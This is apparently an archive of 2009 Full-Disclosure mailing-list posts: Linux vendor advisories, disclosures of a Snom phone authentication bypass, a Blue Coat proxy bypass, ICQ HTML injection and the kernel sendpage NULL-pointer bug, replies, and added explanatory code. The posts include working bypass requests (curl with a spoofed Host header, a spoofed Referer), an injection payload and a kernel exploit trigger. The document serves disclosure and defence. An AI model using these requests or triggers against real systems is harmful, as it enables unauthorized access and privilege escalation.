[Full-disclosure] SUSE Security Announcement: subversion (SUSE-SA:2009:044)
SUSE Security Announcement

Package:                subversion
Announcement ID:        SUSE-SA:2009:044
Date:                   Fri, 14 Aug 2009 10:00:00 +
Affected Products:      openSUSE 10.3
                        openSUSE 11.0
                        openSUSE 11.1
                        SLES SDK 9
                        SLE SDK 10 SP2
                        SUSE Linux Enterprise Desktop 10 SP2
                        SLES 11 DEBUGINFO
                        SLE 11
Vulnerability Type:     remote code execution
Severity (1-10):        8
SUSE Default Package:   no
Cross-References:       CVE-2009-2411

Content of This Advisory:
  1) Security Vulnerability Resolved:
       remote code execution
     Problem Description
  2) Solution or Work-Around
  3) Special Instructions and Notes
  4) Package Location and Checksums
  5) Pending Vulnerabilities, Solutions, and Work-Arounds:
       - fetchmail
       - wget
  6) Authenticity Verification and Additional Information

1) Problem Description and Brief Discussion

Subversion is a revision control system, which is mainly used for code development. The libsvn_delta library is vulnerable to integer overflows while processing svndiff streams, which lead to overflows on the heap because of insufficient memory allocation. This bug can be exploited by clients with commit access to cause a remote denial of service or arbitrary code execution. It can also be exploited in the other direction, from a server to a client that tries to do a checkout or update.

2) Solution or Work-Around

Please update.

3) Special Instructions and Notes

Please restart a standalone server.

4) Package Location and Checksums

The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command

  rpm -Fhv file.rpm

to apply the update, replacing file.rpm with the filename of the downloaded RPM package.
[Full-disclosure] Authentication Bypass of Snom Phone Web Interface
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
# Product:  Snom VoIP/SIP Phones (Snom300, Snom320, Snom360, Snom370, Snom820)
# Vendor:   snom technology AG
# CVE ID:   CVE-2009-1048
# Subject:  Authentication Bypass of Snom Phone Web Interface
# Risk:     High
# Effect:   Remote
# Author:   Walter Sprenger
# Date:     August 13, 2009
#

Introduction:
-------------
The VoIP phones of snom technology AG can be configured, monitored or controlled with a browser connecting to the built-in web interface. It is strongly recommended to enable authentication on the web interface and to set a strong password. By constructing a specially crafted HTTP request, the authentication of the web interface can be completely bypassed.

Impact:
-------
Access to the web interface without authentication enables a malicious user to [2]:
- call expensive numbers
- listen to the phone conversation by capturing the network traffic
- read SIP username and password
- read and modify all configuration parameters of the phone
- redirect phone calls to another VoIP server
- activate the microphone and listen to the conversation in the room

Affected:
---------
- The tests have been conducted on a Snom360, firmware versions:
  - snom360 linux 3.25/snom360-SIP 6.5.17
  - snom360 linux 3.25/snom360-SIP 6.5.18
  - snom360-SIP 7.1.30
  - snom360-SIP 7.1.35 14552
- All Snom300, Snom320, Snom360, Snom370 and Snom820 with firmware versions below 6.5.20, 7.1.39 and 7.3.14 are vulnerable according to snom technology AG
- Not vulnerable:
  - Firmware version 6.5.20 and higher
  - Firmware version 7.1.39 and higher
  - Firmware version 7.3.14 and higher

Technical Description:
----------------------
The web interface of the Snom VoIP/SIP phones is protected by Basic Authentication or Digest Authentication. The authentication can be completely bypassed by modifying the HTTP request. A normal browser sets the request header Host: to the IP address or the host name that is entered in the URL field of the browser. If the request header is modified to contain the value Host: 127.0.0.1, all pages and functions of the web interface can be reached without prompting the user to authenticate.

How to test:

  curl -H "Host: 127.0.0.1" http://<IP address of phone>/
  curl -k -H "Host: 127.0.0.1" https://<IP address of phone>/

- if the phone is vulnerable, the index page of the web interface is returned
- if the phone is not vulnerable, an HTTP/1.1 401 Unauthorized response is returned

Workaround / Fix:
-----------------
- Upgrade to firmware version 6.5.20, 7.1.39, 7.3.14 or above
- Disable the web interface until a firmware upgrade is installed

Timeline:
---------
Vendor Notified:  March 19, 2009
Vendor Status:    Replied on March 19 and March 30, vulnerability confirmed
Vendor Response:  Problem fixed in firmware version 7.1.39/7.3.14. Problem will be fixed in version 6.
Patch available:  Firmware upgrade to versions 6.5.20, 7.1.39, 7.3.14 and above

References:
-----------
[1]: http://www.snom.de
[2]: http://www.csnc.ch/misc/files/publications/V6_attacking_voip_v1.0.pdf

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] http://secreview.blogspot.com -- end of life
Hi Everyone,

We received a lot of emails from different people asking us what happened to our blog at http://secreview.blogspot.com. What happened is we decided to shut down operations because we don't have time to keep doing reviews. We also don't have time to redo reviews, which is needed to keep the reviews fair. We all have full time jobs and recently have been traveling a lot.

We started secreview because we wanted to expose security companies for what they really were. But now, because we can't do it any more, we don't think it's fair that only some companies get reviewed and others don't. So we deleted the blog (but we have 90 days to bring it back if people want it). If we do bring it back, we will probably not do any more reviews and we will leave it up just because.

Do people want the blog to be recovered or do they want us to keep it dead?

-- Secreview
[Full-disclosure] [SECURITY] [DSA 1861-1] New libxml packages fix several issues
Debian Security Advisory DSA-1861-1                      secur...@debian.org
http://www.debian.org/security/                                  Nico Golde
August 13th, 2009                      http://www.debian.org/security/faq

Package        : libxml
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE IDs        : CVE-2009-2416 CVE-2009-2414

Rauli Kaksonen, Tero Rontti and Jukka Taimisto discovered several vulnerabilities in libxml, a library for parsing and handling XML data files, which can lead to denial of service conditions or possibly arbitrary code execution in the application using the library. The Common Vulnerabilities and Exposures project identifies the following problems:

An XML document with specially-crafted Notation or Enumeration attribute types in a DTD definition leads to the use of pointers to memory areas which have already been freed (CVE-2009-2416).

Missing checks for the depth of ELEMENT DTD definitions when parsing child content can lead to extensive stack growth due to function recursion, which can be triggered via a crafted XML document (CVE-2009-2414).

For the oldstable distribution (etch), this problem has been fixed in version 1.8.17-14+etch1.

The stable (lenny), testing (squeeze) and unstable (sid) distributions do not contain libxml anymore but libxml2, for which DSA-1859-1 has been released.

We recommend that you upgrade your libxml packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian (oldstable)
------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
[Full-disclosure] ICQ 6.5 HTML-injection vulnerability
ShineShadow Security Report 14082009-08

TITLE
ICQ 6.5 HTML-injection vulnerability

BACKGROUND
With more than 700 million instant messages sent and received every day, ICQ has been known to the online community as a messaging service. Today, a little more than a decade after the first ICQ instant messaging service was launched, it has become much more than just that. ICQ is a personal communication tool that allows users to meet and interact through instant messaging services such as text, voice, video and VoIP as well as various entertainment and community products.
Source: http://www.icq.com

VULNERABLE PRODUCTS
ICQ 6.5 build 1042 (latest build)
Previous versions and localized distributions may also be affected

DETAILS
An HTML-injection vulnerability exists in the official ICQ client software. The incoming message window in the vulnerable ICQ client has a web browser nature. An attacker can try to exploit the vulnerability by sending a specially crafted message to the remote ICQ client. The malicious message can contain text data which will be interpreted and displayed in the incoming message window as HTML code. Potentially, arbitrary HTML code could be injected.

Two impacts of the vulnerability have been detected:

1. Information disclosure
For example, an attacker can inject an IMG tag that could lead to information disclosure (such as the remote client's IP address, browser version, OS version, etc.)

2. Spoofing
An attacker can spoof the ICQ client software's system messages, interface elements (buttons, links) in the message window, etc. For example, it could be used to force ICQ users to click on an attacker's malicious link.

Maybe other impacts are possible.

EXPLOITATION
A remote attacker can exploit this vulnerability using any instant messenger software with OSCAR (ICQ) protocol support by sending a specially crafted message.

Example of exploit message:

  file://1/a[HTML CODE]

Note that the internal ICQ antispam engine will block some text/html data if the attacker's ICQ UIN is not in the user's ICQ contact list.

DISCLOSURE POLICY
The "Full disclosure" policy has been applied. Vendor has not been contacted.

CREDITS
Maxim A. Kulakov (aka ShineShadow)
ss_conta...@hotmail.com
Re: [Full-disclosure] Linux NULL pointer dereference due to incorrect proto_ops initializations
Tavis Ormandy writes:
> Linux NULL pointer dereference due to incorrect proto_ops initializations

Quick and dirty exploit for this one: http://www.frasunek.com/proto_ops.tgz

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: veng...@czuby.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
Re: [Full-disclosure] http://secreview.blogspot.com -- end of life
Please bring it back. It was a nice blog, or send me an archive of the ut.

Thankx

./Chuks

On 8/13/09, secrev...@hushmail.me <secrev...@hushmail.me> wrote:
> Hi Everyone,
>
> We received a lot of emails from different people asking us what happened to our blog at http://secreview.blogspot.com. What happened is we decided to shut down operations because we don't have time to keep doing reviews. We also don't have time to redo reviews, which is needed to keep the reviews fair. We all have full time jobs and recently have been traveling a lot.
>
> We started secreview because we wanted to expose security companies for what they really were. But now, because we can't do it any more, we don't think it's fair that only some companies get reviewed and others don't. So we deleted the blog (but we have 90 days to bring it back if people want it). If we do bring it back, we will probably not do any more reviews and we will leave it up just because.
>
> Do people want the blog to be recovered or do they want us to keep it dead?
>
> -- Secreview

-- 
Gichuki John Ndirangu, C.E.H, C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM} http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
[Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
Title  : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND eventually the 3rd party url filtering solution)
Date   : 14/08/2009
Author : Antoine Santo

** Test one : Try to browse http://www.fcnantes.com/
   Result : I need an Account **

GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive

-

HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: BASIC realm="ACCES"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Proxy-Connection: close
Set-Cookie: BCSI-CS-XXX0302B32A48XXX=2; Path=/
Connection: close
Content-Length: 733

<HTML><HEAD><TITLE>Authentification needed</TITLE></HEAD><BODY></BODY></HTML>

** Test two : I just add a spoofed HTTP header REFERER to a whitelisted (localdatabase) site
   Result : W00t !! **

GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: BCSI-CS-XXX0302B32A48XXX=2
Referer: http://www.mappy.fr

-

HTTP/1.1 200 OK
Date: Fri, 14 Aug 2009 12:41:44 GMT
Server: Apache/2.2.3 (Debian)
Content-Type: text/html
Transfer-Encoding: chunked
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0

133f
<HTML>
<HEAD>
<TITLE>fcnantes.com - Site officiel du FC Nantes</TITLE>
<meta name="description" content="Actualité du Footbal
snip
</HTML>

*** By the way, http://www.fcnantes.com/ is not even allowed by the url filter with my legal account ;) ***
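Both the Snom advisory above (Host: 127.0.0.1 skipping web-interface authentication) and this Blue Coat post (a Referer naming an allowed site skipping proxy authentication) are the same class of bug: an access decision driven by a header the client writes. The following is an added example, not code from Snom, Blue Coat or either author; the "reported" functions are constructed models of the described behaviour, not the products' implementations, and the credential and allow list are constructed values.

```python
"""Access decisions that trust client-controlled HTTP headers.

Added example; not code from Snom, Blue Coat or either post's author. The
"reported" functions are constructed models of the behaviour the two posts
describe, not the products' real implementations. The credential and the
allow list are constructed values.
"""
import base64
import ipaddress
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Request:
    peer_ip: str                                 # address the TCP connection came from
    headers: dict = field(default_factory=dict)  # header name -> value, any case

    def header(self, name, default=""):
        for key, value in self.headers.items():  # header names are case-insensitive
            if key.lower() == name.lower():
                return value
        return default


# ---- Snom-style phone web interface (the CVE-2009-1048 pattern) -------------

ADMIN_CREDENTIALS = {"admin": "constructed-sample-password"}   # constructed


def basic_auth_header(user, password):
    """Authorization value a client sends for HTTP Basic authentication."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def has_valid_basic_auth(req):
    value = req.header("Authorization")
    if not value.startswith("Basic "):
        return False
    try:
        user, _, password = base64.b64decode(value[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return False
    return ADMIN_CREDENTIALS.get(user) == password


def phone_ui_reported(req):
    """Model of the reported bug: a Host header naming the loopback address is
    taken as proof that the request is local, so authentication is skipped."""
    if req.header("Host").split(":")[0] == "127.0.0.1":
        return 200
    return 200 if has_valid_basic_auth(req) else 401


def phone_ui_fixed(req):
    """Hardened model: the Host header is not an input to the decision at all;
    every request must present valid credentials."""
    return 200 if has_valid_basic_auth(req) else 401


def spoofed_loopback_host(req):
    """Detection signal (web server log or IDS rule): the client claims a
    loopback Host while the connection did not come from a loopback address."""
    claimed = req.header("Host").split(":")[0]
    try:
        claimed_loopback = ipaddress.ip_address(claimed).is_loopback
    except ValueError:
        return False                             # a hostname, not an IP literal
    return claimed_loopback and not ipaddress.ip_address(req.peer_ip).is_loopback


# ---- Blue Coat-style proxy policy (the Referer observation) -----------------

NO_AUTH_SITES = {"www.mappy.fr"}   # the site the post calls whitelisted; constructed list


def proxy_reported(req, proxy_authenticated):
    """Model of the observed behaviour: a Referer pointing at an allowed site
    is honoured as if the destination itself were allowed."""
    referer_host = urlsplit(req.header("Referer")).hostname
    if req.header("Host") in NO_AUTH_SITES or referer_host in NO_AUTH_SITES:
        return 200
    return 200 if proxy_authenticated else 407


def proxy_fixed(req, proxy_authenticated):
    """Hardened model: only the destination, never a client-supplied Referer,
    can exempt a request from proxy authentication."""
    if req.header("Host") in NO_AUTH_SITES:
        return 200
    return 200 if proxy_authenticated else 407


if __name__ == "__main__":
    spoofed = Request("192.0.2.10", {"Host": "127.0.0.1"})
    print("phone, spoofed Host   :", phone_ui_reported(spoofed), "->", phone_ui_fixed(spoofed),
          "| detected:", spoofed_loopback_host(spoofed))
    via_referer = Request("192.0.2.10", {"Host": "www.fcnantes.com",
                                         "Referer": "http://www.mappy.fr"})
    print("proxy, spoofed Referer:", proxy_reported(via_referer, False), "->",
          proxy_fixed(via_referer, False))
```

The detection helper is the piece worth carrying into a real deployment: a loopback Host from a non-loopback peer is never legitimate and is cheap to alert on.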
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
Is it working on all versions ?

On 14 Aug 09 at 15:10, anto...@santo.fr wrote:
> Title  : ByPass a BlueCoat Proxy 8100 Serie (authentification request AND eventually the 3rd party url filtering solution)
> Date   : 14/08/2009
> Author : Antoine Santo
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
> ** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site
>    Result : W00t !! **

Can you elaborate on "to a whitelisted (localdatabase) site"? None of the rules defined in the Web Authentication Layer or Web Access Layer have a whitelist attribute. In the list of available actions for the Web Authentication Layer there's: Do Not Authenticate, ForceAuthenticate1 and Deny. In the Web Access Layer list of available actions there are a couple dozen options, none of which are labeled whitelist or whitelisted. Also, I'm not sure what you mean by localdatabase. Internal http traffic shouldn't hit the proxies...

Using an 8100-C with SG05 5.2.4.3.

-Guy
[Full-disclosure] nullpointer fix question
hi!

Should this fix work against the nullpointer linux kernel vulnerability? Should it break any services on a usual LAMP machine?

thx,

ps: sorry i lost the header for original message

maxigas

> So, here's the contents of disabled-protocols.
>
> # these networking protocols are not needed on this server
> install net-pf-3 /bin/true    # Amateur Radio AX.25
> install net-pf-4 /bin/true    # Novell IPX
> install net-pf-5 /bin/true    # AppleTalk DDP
> install net-pf-6 /bin/true    # Amateur Radio NET/ROM
> install net-pf-8 /bin/true    # ATM PVCs
> install net-pf-9 /bin/true    # Reserved for X.25 project
> install net-pf-10 /bin/true   # IP version 6
> install net-pf-11 /bin/true   # Amateur Radio X.25 PLP
> install net-pf-12 /bin/true   # Reserved for DECnet project
> install net-pf-13 /bin/true   # Reserved for 802.2LLC project
> install net-pf-18 /bin/true   # Ash
> install net-pf-19 /bin/true   # Acorn Econet
> install net-pf-20 /bin/true   # ATM SVCs
> install net-pf-22 /bin/true   # Linux SNA Project (nutters!)
> install net-pf-23 /bin/true   # IRDA sockets
> install net-pf-24 /bin/true   # PPPoX sockets
> install net-pf-25 /bin/true   # Wanpipe API Sockets
> install net-pf-26 /bin/true   # Linux LLC
> install net-pf-30 /bin/true   # TIPC sockets
> install net-pf-31 /bin/true   # Bluetooth sockets
>
> On the servers where I really care about security, I disable most networking protocols by installing the attached file as:
>
>   /etc/modprobe.d/disabled-protocols
>
> [Note that this file disables IPv6.]
>
> It's safest to reboot after installing this file, in case any of the networking-protocol modules have already been inserted into the kernel.
Re: [Full-disclosure] nullpointer fix question
maxigas <maxi...@anargeek.net> wrote:
> hi! Should this fix work against the nullpointer linux kernel vulnerability?

It looks incomplete, I don't see PF_ISDN or PF_IUCV, for example. But this general approach looks fine, and is actually what Red Hat have recommended to their customers.

https://bugzilla.redhat.com/show_bug.cgi?id=516949#c10

Obviously if you don't use redhat, you should check what else your distribution provides.

> Should it break any services on a usual LAMP machine?

If you know you don't need PF_INET6, then it should be fine. You would most likely know if you needed the others.

Thanks, Tavis.

-- 
tav...@sdf.lonestar.org | finger me for my pgp key.
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
From: Sebastien gioria <s...@gioria.org>
> Is it working on all versions ?

Tested version :
- Software version: SGOS 5.2.4.14 Proxy Edition
[Full-disclosure] [ MDVSA-2009:202 ] memcached
Mandriva Linux Security Advisory                         MDVSA-2009:202
http://www.mandriva.com/security/

Package : memcached
Date    : August 14, 2009
Affected: 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0

Problem Description:

A vulnerability has been found and corrected in memcached:

Multiple integer overflows in memcached 1.1.12 and 1.2.2 allow remote attackers to execute arbitrary code via vectors involving length attributes that trigger heap-based buffer overflows (CVE-2009-2415).

This update provides a solution to this vulnerability. Additionally, memcached-1.2.x has been upgraded to 1.2.8 for 2009.0/2009.1 and MES 5, which contains a number of upstream fixes; the repcached patch has been upgraded to 2.2 as well.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2415

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com

Type Bits/KeyID     Date        User ID
pub  1024D/22458A98 2000-07-10  Mandriva Security Team <security*mandriva.com>
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
> ** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site
>    Result : W00t !! **

Antoine,

Would you mind sharing the policy (on the bluecoat) you're referring to for www.mappy.fr? What is the Action for that host or IP set to? You mentioned whitelisted but that could mean anything from the list of options in the policy manager.

Thanks,
Guy
[Full-disclosure] Mr. Magorium's Wunderbar Emporium
For those who have been living under a rock for the past two days, an exploit exists for Julien Tinnes/Tavis Ormandy's sendpage vulnerability in all Linux kernels since 2001. My exploit works on 2.4, 2.6, x86, x64, 4k stacks, 8k stacks, with/without cred framework, bypasses mmap_min_addr in any public way possible (auto-detecting which method to use). As always, while in ring0 it provides the added convenience of disabling auditing, SELinux, AppArmor, and all other LSM modules. If SELinux is enforcing, it will also rewrite the SELinux code to fool userland into thinking it remains in enforcing mode. And if the machine supports it, it'll play a nice video for you in your terminal.

See http://www.youtube.com/watch?v=arAfIp7YzZ4 for a demo.

I wanted to implement a more interactive sense of Russian roulette in the exploit, with a randomly-generated 1 in 6 chance of hot rebooting the machine into FreeDOS (first exploit to reboot you into a secure operating system) but I don't have time -- I'm off to Miami!

Congrats Linus on screwing over all the vendors and every Linux user by forcing disclosure of the bug before vendors could ship out updated kernels. Your patch applies well to their binary packages.

-Brad
Re: [Full-disclosure] Linux NULL pointer dereference due to incorrect proto_ops initializations
Excellent catch! This bug report has been cited from many places now. Thanks to Tavis Ormandy and Julien Tinnes.

-- Soo-Hyun (s.c...@hackers.org.uk)

On Thu, Aug 13, 2009 at 19:57, Tavis Ormandy <tav...@sdf.lonestar.org> wrote:

Linux NULL pointer dereference due to incorrect proto_ops initializations
-

In the Linux kernel, each socket has an associated struct of operations called proto_ops which contain pointers to functions implementing various features, such as accept, bind, shutdown, and so on.

If an operation on a particular socket is unimplemented, they are expected to point the associated function pointer to predefined stubs, for example if the accept operation is undefined it would point to sock_no_accept(). However, we have found that this is not always the case and some of these pointers are left uninitialized.

This is not always a security issue, as the kernel validates the pointers at the call site, such as this example from sock_splice_read:

    static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
                                    struct pipe_inode_info *pipe, size_t len,
                                    unsigned int flags)
    {
        struct socket *sock = file->private_data;

        if (unlikely(!sock->ops->splice_read))
            return -EINVAL;

        return sock->ops->splice_read(sock, ppos, pipe, len, flags);
    }

But we have found an example where this is not the case; the sock_sendpage() routine does not validate the function pointer is valid before dereferencing it, and therefore relies on the correct initialization of the proto_ops structure.

We have identified several examples where the initialization is incomplete:

- The SOCKOPS_WRAP macro defined in include/linux/net.h, which appears correct at first glance, was actually affected. This includes PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 and PF_AX25 families.
- Initializations were missing in other protocols, including PF_BLUETOOTH, PF_IUCV, PF_INET6 (with IPPROTO_SCTP), PF_PPPOX and PF_ISDN.

Affected Software
---

All Linux 2.4/2.6 versions since May 2001 are believed to be affected:

- Linux 2.4, from 2.4.4 up to and including 2.4.37.4
- Linux 2.6, from 2.6.0 up to and including 2.6.30.4

Consequences
---

This issue is easily exploitable for local privilege escalation. In order to exploit this, an attacker would create a mapping at address zero containing code to be executed with privileges of the kernel, and then trigger a vulnerable operation using a sequence like this:

    /* ... */
    int fdin = mkstemp(template);
    int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);
    unlink(template);
    ftruncate(fdin, PAGE_SIZE);
    sendfile(fdout, fdin, NULL, PAGE_SIZE);
    /* ... */

Please note, sendfile() is just one of many ways to cause a sendpage operation on a socket.

Successful exploitation will lead to complete attacker control of the system.

Mitigation
---

Recent kernels with mmap_min_addr support may prevent exploitation if the sysctl vm.mmap_min_addr is set above zero. However, administrators should be aware that LSM based mandatory access control systems, such as SELinux, may alter this functionality.

It should also be noted that all kernels up to 2.6.30.2 are vulnerable to published attacks against mmap_min_addr.

Solution
---

Linus committed a patch correcting this issue on 13th August 2009.

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e694958388c50148389b0e9b9e9e8945cf0f1b98

Credit
---

This bug was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.

--
- tav...@sdf.lonestar.org | finger me for my gpg key.
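As an added example, not part of the advisory and not kernel code: a user-space model of the bug class the advisory describes and of the fix. `struct proto_ops`, `struct socket` and `sock_no_sendpage` borrow the kernel's names but are cut-down stand-ins (the kernel's real sock_no_sendpage() falls back to the sendmsg path rather than returning an error). It shows that a designated initializer silently leaves omitted slots NULL, how an unchecked dispatcher in the shape of the pre-fix sock_sendpage() trusts that slot, how the kernel_sendpage()-style test the fix introduced falls back to the stub, and a small audit that counts NULL slots in a table.

```c
/* Added example, not from the advisory and not kernel code: a user-space model
 * of the proto_ops initialization bug and of the fix.  The kernel's names are
 * borrowed for readability; every body below is a stand-in and no real socket
 * is involved. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>

struct socket;                                   /* opaque stand-in */

/* Cut-down ops table, same idea as the kernel's struct proto_ops. */
struct proto_ops {
    int     (*bind)(struct socket *sock);
    int     (*accept)(struct socket *sock);
    ssize_t (*sendpage)(struct socket *sock, size_t len);
};

/* Kernel convention: every slot points at a handler or a sock_no_*() stub.
 * (The real sock_no_sendpage() falls back to the sendmsg path; this model
 * just reports the operation as unsupported.) */
static int sock_no_bind(struct socket *sock)   { (void)sock; return -EOPNOTSUPP; }
static int sock_no_accept(struct socket *sock) { (void)sock; return -EOPNOTSUPP; }
static ssize_t sock_no_sendpage(struct socket *sock, size_t len)
{
    (void)sock; (void)len;
    return -EOPNOTSUPP;
}
static ssize_t real_sendpage(struct socket *sock, size_t len)
{
    (void)sock;
    return (ssize_t)len;                         /* "sent" everything */
}

/* A correctly filled table: no NULL slots. */
static const struct proto_ops complete_ops = {
    .bind     = sock_no_bind,
    .accept   = sock_no_accept,
    .sendpage = real_sendpage,
};

/* The bug class from the advisory: .sendpage is simply omitted.  C zero-fills
 * omitted members, so the slot is NULL and the compiler says nothing. */
static const struct proto_ops incomplete_ops = {
    .bind   = sock_no_bind,
    .accept = sock_no_accept,
};

/* Pre-fix shape of sock_sendpage(): trusts the table.  With incomplete_ops
 * this is an indirect call through address 0; in the kernel that is whatever
 * an attacker managed to map at page zero. */
ssize_t sendpage_unchecked(const struct proto_ops *ops, struct socket *sock, size_t len)
{
    return ops->sendpage(sock, len);
}

/* Post-fix shape: the commit routed sock_sendpage() through kernel_sendpage(),
 * which tests the slot and falls back to the stub. */
ssize_t sendpage_checked(const struct proto_ops *ops, struct socket *sock, size_t len)
{
    if (ops->sendpage)
        return ops->sendpage(sock, len);
    return sock_no_sendpage(sock, len);
}

/* Audit helper: count NULL slots.  Run over every table a protocol family
 * registers, this is the check that finds missing initializers before a
 * dispatcher has to. */
int count_null_ops(const struct proto_ops *ops)
{
    int missing = 0;

    missing += (ops->bind     == NULL);
    missing += (ops->accept   == NULL);
    missing += (ops->sendpage == NULL);
    return missing;
}

int main(void)
{
    printf("complete_ops:   %d NULL slot(s), checked sendpage(64) -> %zd\n",
           count_null_ops(&complete_ops), sendpage_checked(&complete_ops, NULL, 64));
    printf("incomplete_ops: %d NULL slot(s), checked sendpage(64) -> %zd\n",
           count_null_ops(&incomplete_ops), sendpage_checked(&incomplete_ops, NULL, 64));
    /* sendpage_unchecked(&incomplete_ops, NULL, 64) would call address 0. */
    return 0;
}
```

The point of the audit helper is that the call-site check and the table check are complementary: the fix hardened one dispatcher, but a table with a NULL slot is still a latent bug for the next caller that trusts it.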
Re: [Full-disclosure] Mr. Magorium's Wunderbar Emporium
On Fri, 14 Aug 2009 14:53:06 EDT, Brad Spengler said:

Congrats Linus on screwing over all the vendors and every Linux user by forcing disclosure of the bug before vendors could ship out updated kernels. Your patch applies well to their binary packages.

Poor Linus can't catch a break. Just like 3 weeks ago some guy named Brad Spengler was ripping him a new one:

(Really there should have been a CVE for the lack of -fno-delete-null-pointer-checks instead of pretending the only problem was /dev/net/tun. As the commit to add it showed (and at least 10 other commits to the kernel this weekend) lots of other code was affected, so someone not applying a fix for a CVE mentioning only /dev/net/tun because they don't have the code for /dev/net/tun compiled in, is going to be missing out on a number of fixes).

Of course, getting a CVE for that issue would have forced disclosure of the bug too, quite possibly before the vendors were ready to ship updated kernels. In general, you *can't* have both "flag fixes as security issues right up front before vendors have a chance to backport" and "don't screw over the vendors and users". So how do you suggest that Linus could have handled this in a manner that didn't screw over vendors and users?

Out of curiosity, did *you* do your due diligence and not release that exploit until you had verified that all the vendors had updated kernels ready to ship? :)
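Valdis's aside about -fno-delete-null-pointer-checks refers to a C pattern that is worth seeing in isolation. The block below is an added example, not from the post or from the kernel; struct tun_struct, struct sock and the two poll functions are simplified stand-ins for the 2009 /dev/net/tun code path, and the sample data is constructed.

```c
/* Added example, not from the post or the kernel.  The structs and both poll
 * functions are simplified stand-ins for the 2009 /dev/net/tun code path. */
#include <poll.h>
#include <stddef.h>

struct sock { int readable; };
struct tun_struct { struct sock *sk; };

/* Constructed sample data so the functions can be exercised. */
static struct sock       sample_sk  = { 1 };
static struct tun_struct sample_tun = { &sample_sk };

/* Shape of the tun bug: tun is dereferenced on the first line and tested on
 * the second.  Dereferencing NULL is undefined behaviour, so GCC at -O2 may
 * treat tun as non-NULL after line one and delete the test entirely.  With
 * tun == NULL the first line reads through address 0; if the attacker has
 * mapped page zero that read succeeds, the deleted check no longer stops
 * execution, and sk is now a pointer the attacker chose.  This is the
 * pattern -fno-delete-null-pointer-checks keeps honest at build time. */
unsigned int poll_check_after_use(struct tun_struct *tun)
{
    struct sock *sk = tun->sk;

    if (!tun)
        return POLLERR;
    return sk->readable ? POLLIN : 0;
}

/* The flag-independent fix: test the pointer before anything reads through it. */
unsigned int poll_check_before_use(struct tun_struct *tun)
{
    struct sock *sk;

    if (!tun)
        return POLLERR;
    sk = tun->sk;
    return sk->readable ? POLLIN : 0;
}

int main(void)
{
    /* Never call poll_check_after_use(NULL): it reads through address 0. */
    return (poll_check_before_use(NULL) == POLLERR &&
            poll_check_after_use(&sample_tun) == POLLIN) ? 0 : 1;
}
```

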